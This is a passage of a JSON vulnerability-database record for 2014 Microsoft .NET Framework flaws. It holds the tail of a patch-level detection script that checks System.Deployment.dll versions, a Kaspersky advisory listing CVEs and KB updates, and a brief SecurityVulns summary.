.NET Framework 2.0 SP2 #\n# Windows Server 2003 SP2 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.Deployment.dll\", version:\"2.0.50727.3663\", min_version:\"2.0.50727.3000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.Deployment.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.4000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979574\");\nvuln += missing;\n\n########### KB2979575 ############\n# .NET Framework 4 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n# Windows Server 2003 SP2 #\n##################################\nmissing = 0;\n\n# Windows Server 2003 SP2\n# GDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.1029\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.2048\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\n# Windows Vista/Server 2008 SP2\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.1029\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.2048\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\n# Windows 7/Server 2008 R2 SP1\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.Deployment.dll\", version:\"4.0.30319.1029\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.Deployment.dll\", version:\"4.0.30319.2048\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979575\");\nvuln += missing;\n\n########### KB2979576 ############\n# .NET Framework 4.5.1/4.5.2 #\n# Windows 8.1 #\n# Windows 8.1 RT #\n# Windows Server 2012 R2 #\n##################################\nmissing = 0;\nif (dotnet_451_installed || dotnet_452_installed)\n{\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.deployment.dll\", version:\"4.0.30319.34243\", min_version:\"4.0.30319.10000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.deployment.dll\", version:\"4.0.30319.36255\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n}\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979576\");\nvuln += missing;\n\n########## KB2979577 #############\n# .NET Framework 4.5/4.5.1/4.5.2 #\n# Windows 8.1 #\n# Windows RT #\n# Windows Server 2012 R2 #\n##################################\nif (dotnet_45_installed || dotnet_451_installed || dotnet_452_installed)\n{\n missing = 0;\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.deployment.dll\", version:\"4.0.30319.34243\", min_version:\"4.0.30319.10000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.deployment.dll\", version:\"4.0.30319.36255\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979577\");\n vuln += missing;\n}\n\n########### KB2979578 ############\n# .NET Framework 4.5/4.5.1/4.5.2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\nif (dotnet_45_installed || dotnet_451_installed || dotnet_452_installed)\n{\n # Windows Vista/Server 2008 SP2\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.34244\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.36256\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # Windows 7/Server 2008 R2 SP1\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.Deployment.dll\", version:\"4.0.30319.34244\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.Deployment.dll\", version:\"4.0.30319.36256\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n}\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979578\");\nvuln += missing;\n\n# Report\nif(vuln > 0)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, \"affected\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:44:27", "bulletinFamily": "info", "cvelist": ["CVE-2014-4062", "CVE-2014-4073", "CVE-2014-0257", "CVE-2014-4122", "CVE-2014-4121", "CVE-2014-0253", "CVE-2014-0295", "CVE-2014-1806", "CVE-2014-4149", "CVE-2014-4072"], "description": "### *Detect date*:\n11/11/2014\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft .NET Framework. Malicious users can exploit these vulnerabilities to cause denial of service, bypass security restrictions fain privileges, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft .NET Framework version 1.0 Service Pack 3 \nMicrosoft .NET Framework version 1.1 Service Pack 1 \nMicrosoft .NET Framework version 2.0 Service Pack 2 \nMicrosoft .NET Framework versions 3.5, 3.5.1, 4, 4.5, 4.5.1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2014-4072](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4072>) \n[CVE-2014-0257](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0257>) \n[CVE-2014-0253](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0253>) \n[CVE-2014-0295](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0295>) \n[CVE-2014-4149](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4149>) \n[CVE-2014-4122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4122>) \n[CVE-2014-4121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4121>) \n[CVE-2014-4062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4062>) \n[CVE-2014-4073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4073>) \n[CVE-2014-1806](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1806>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2014-4072](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4072>)5.0Critical \n[CVE-2014-0257](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0257>)9.3Critical \n[CVE-2014-0253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0253>)5.0Critical \n[CVE-2014-0295](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0295>)4.3Warning \n[CVE-2014-4149](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4149>)9.3Critical \n[CVE-2014-4122](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4122>)4.3Warning \n[CVE-2014-4121](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4121>)10.0Critical \n[CVE-2014-4062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4062>)4.3Warning \n[CVE-2014-4073](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4073>)10.0Critical \n[CVE-2014-1806](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1806>)10.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[2972098](<http://support.microsoft.com/kb/2972098>) \n[2898855](<http://support.microsoft.com/kb/2898855>) \n[2898856](<http://support.microsoft.com/kb/2898856>) \n[2898857](<http://support.microsoft.com/kb/2898857>) \n[2898858](<http://support.microsoft.com/kb/2898858>) \n[2979578](<http://support.microsoft.com/kb/2979578>) \n[2979575](<http://support.microsoft.com/kb/2979575>) \n[2979574](<http://support.microsoft.com/kb/2979574>) \n[2979577](<http://support.microsoft.com/kb/2979577>) \n[2979576](<http://support.microsoft.com/kb/2979576>) \n[2979571](<http://support.microsoft.com/kb/2979571>) \n[2979570](<http://support.microsoft.com/kb/2979570>) \n[2979573](<http://support.microsoft.com/kb/2979573>) \n[2931365](<http://support.microsoft.com/kb/2931365>) \n[2931366](<http://support.microsoft.com/kb/2931366>) \n[2931367](<http://support.microsoft.com/kb/2931367>) \n[2931368](<http://support.microsoft.com/kb/2931368>) \n[2984625](<http://support.microsoft.com/kb/2984625>) \n[2979568](<http://support.microsoft.com/kb/2979568>) \n[2904878](<http://support.microsoft.com/kb/2904878>) \n[2943344](<http://support.microsoft.com/kb/2943344>) \n[2943357](<http://support.microsoft.com/kb/2943357>) \n[3000414](<http://support.microsoft.com/kb/3000414>) \n[2972105](<http://support.microsoft.com/kb/2972105>) \n[2972107](<http://support.microsoft.com/kb/2972107>) \n[2972106](<http://support.microsoft.com/kb/2972106>) \n[2972101](<http://support.microsoft.com/kb/2972101>) \n[2972100](<http://support.microsoft.com/kb/2972100>) \n[2972103](<http://support.microsoft.com/kb/2972103>) \n[2973113](<http://support.microsoft.com/kb/2973113>) \n[2973112](<http://support.microsoft.com/kb/2973112>) \n[2973115](<http://support.microsoft.com/kb/2973115>) \n[2973114](<http://support.microsoft.com/kb/2973114>) \n[2978121](<http://support.microsoft.com/kb/2978121>) \n[2978120](<http://support.microsoft.com/kb/2978120>) \n[2978122](<http://support.microsoft.com/kb/2978122>) \n[2932079](<http://support.microsoft.com/kb/2932079>) \n[2978124](<http://support.microsoft.com/kb/2978124>) \n[2978127](<http://support.microsoft.com/kb/2978127>) \n[2978126](<http://support.microsoft.com/kb/2978126>) \n[2978128](<http://support.microsoft.com/kb/2978128>) \n[2990931](<http://support.microsoft.com/kb/2990931>) \n[2972215](<http://support.microsoft.com/kb/2972215>) \n[2972214](<http://support.microsoft.com/kb/2972214>) \n[2972216](<http://support.microsoft.com/kb/2972216>) \n[2972211](<http://support.microsoft.com/kb/2972211>) \n[2972213](<http://support.microsoft.com/kb/2972213>) \n[2972212](<http://support.microsoft.com/kb/2972212>) \n[2974268](<http://support.microsoft.com/kb/2974268>) \n[2974269](<http://support.microsoft.com/kb/2974269>) \n[2958732](<http://support.microsoft.com/kb/2958732>) \n[2901128](<http://support.microsoft.com/kb/2901128>) \n[2901125](<http://support.microsoft.com/kb/2901125>) \n[2901127](<http://support.microsoft.com/kb/2901127>) \n[2901126](<http://support.microsoft.com/kb/2901126>) \n[2901120](<http://support.microsoft.com/kb/2901120>) \n[3005210](<http://support.microsoft.com/kb/3005210>) \n[2931356](<http://support.microsoft.com/kb/2931356>) \n[2972207](<http://support.microsoft.com/kb/2972207>) \n[2916607](<http://support.microsoft.com/kb/2916607>) \n[2968296](<http://support.microsoft.com/kb/2968296>) \n[2898868](<http://support.microsoft.com/kb/2898868>) \n[2968294](<http://support.microsoft.com/kb/2968294>) \n[2968295](<http://support.microsoft.com/kb/2968295>) \n[2968292](<http://support.microsoft.com/kb/2968292>) \n[2977766](<http://support.microsoft.com/kb/2977766>) \n[2898860](<http://support.microsoft.com/kb/2898860>) \n[2977765](<http://support.microsoft.com/kb/2977765>) \n[2898865](<http://support.microsoft.com/kb/2898865>) \n[2898864](<http://support.microsoft.com/kb/2898864>) \n[2898866](<http://support.microsoft.com/kb/2898866>) \n[2931358](<http://support.microsoft.com/kb/2931358>) \n[2911502](<http://support.microsoft.com/kb/2911502>) \n[2931354](<http://support.microsoft.com/kb/2931354>) \n[2931357](<http://support.microsoft.com/kb/2931357>) \n[2911501](<http://support.microsoft.com/kb/2911501>) \n[2931352](<http://support.microsoft.com/kb/2931352>) \n[2898869](<http://support.microsoft.com/kb/2898869>) \n[2898870](<http://support.microsoft.com/kb/2898870>) \n[2898871](<http://support.microsoft.com/kb/2898871>) \n[2978114](<http://support.microsoft.com/kb/2978114>) \n[2978116](<http://support.microsoft.com/kb/2978116>) \n[2937608](<http://support.microsoft.com/kb/2937608>) \n[2978125](<http://support.microsoft.com/kb/2978125>) \n[2966828](<http://support.microsoft.com/kb/2966828>) \n[2966827](<http://support.microsoft.com/kb/2966827>) \n[2966826](<http://support.microsoft.com/kb/2966826>) \n[2966825](<http://support.microsoft.com/kb/2966825>) \n[2978042](<http://support.microsoft.com/kb/2978042>) \n[2901115](<http://support.microsoft.com/kb/2901115>) \n[2978041](<http://support.microsoft.com/kb/2978041>) \n[2901110](<http://support.microsoft.com/kb/2901110>) \n[2901111](<http://support.microsoft.com/kb/2901111>) \n[2901112](<http://support.microsoft.com/kb/2901112>) \n[2901113](<http://support.microsoft.com/kb/2901113>) \n[2901118](<http://support.microsoft.com/kb/2901118>) \n[2901119](<http://support.microsoft.com/kb/2901119>) \n[2937610](<http://support.microsoft.com/kb/2937610>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2014-11-11T00:00:00", "id": "KLA10603", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10603", "title": "\r KLA10603Multiple vulnerabilities in Microsoft .NET Framework ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-4133", "CVE-2014-4073", "CVE-2014-4140", "CVE-2014-4122", "CVE-2014-4121", "CVE-2014-4127", "CVE-2014-4138", "CVE-2014-4130", "CVE-2014-4141", "CVE-2014-4971", "CVE-2014-4126", "CVE-2014-4137", "CVE-2014-4128", "CVE-2014-4114", "CVE-2014-4129", "CVE-2014-4113", "CVE-2014-4148", "CVE-2014-4134", "CVE-2014-4132", "CVE-2014-4075", "CVE-2014-4115"], "description": "Restrictions bypass and memory corruptions in Internet Explorer, .Net code execution, TrueType embedded fonts code execution, OLE code execution, message queue service and FAT32 driver privilege escalation.", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:VULN:14016", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14016", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
